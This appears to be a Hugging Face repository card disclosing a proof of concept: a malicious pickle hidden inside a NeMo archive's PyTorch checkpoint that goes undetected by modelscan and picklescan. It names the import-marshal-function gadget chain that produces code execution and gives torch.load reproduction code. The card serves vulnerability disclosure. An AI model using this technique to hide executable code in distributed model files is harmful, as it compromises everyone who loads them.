YAML Metadata Warning:empty or missing yaml metadata in repo card
Check out the documentation for more information.
NeMo (.nemo) Scanner Bypass PoC
Vulnerability
Malicious pickle hidden inside NeMo tar archive's PyTorch checkpoint.
Scanner Bypass
- modelscan 0.8.8: No .nemo scanner β 0 issues
- picklescan 1.0.4: Scans nested .ckpt but chain bypasses detection β 0 infected
ACE
NeMo files are tar archives containing model_weights.ckpt (PyTorch checkpoint with pickle). Extracting and loading the checkpoint via torch.load(weights_only=False) triggers ACE.
Payload: importlib.import_module β marshal.loads β types.FunctionType β ACE
Reproduction
import tarfile, torch
with tarfile.open("malicious_model.nemo", "r") as tar:
ckpt = tar.extractfile("model_weights.ckpt").read()
with open("/tmp/ckpt.bin", "wb") as f: f.write(ckpt)
torch.load("/tmp/ckpt.bin", weights_only=False) # ACE
Environment: PyTorch 2.10.0, modelscan 0.8.8, picklescan 1.0.4
- Downloads last month
- 1
Inference Providers NEW
This model isn't deployed by any Inference Provider. π Ask for provider support